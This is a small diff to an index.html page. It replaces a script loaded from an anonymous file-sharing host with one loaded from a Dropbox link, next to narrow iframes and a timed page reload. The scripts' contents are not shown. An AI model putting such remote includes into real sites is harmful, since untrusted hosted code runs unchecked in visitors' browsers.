--- a/index.html
+++ b/index.html
@@ -28,7 +28,7 @@
 <iframe id="x" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>24
 <iframe id="y" marginwidth="0" marginheight="0" name="ventana_iframe" scrolling="no" border="0" frameborder="0" width="800" height="15"></iframe>25
 
- <script src="https://cdn-106.anonfiles.com/F6D5d9Pfo7/dad9ac57-1598374957/a.js"></script>
+ <script src="https://dl.dropboxusercontent.com/1/view/5dmgnmn237kzxvv/f.js"></script>
  <script>
   setTimeout(function() {
        window.location.href = window.location;
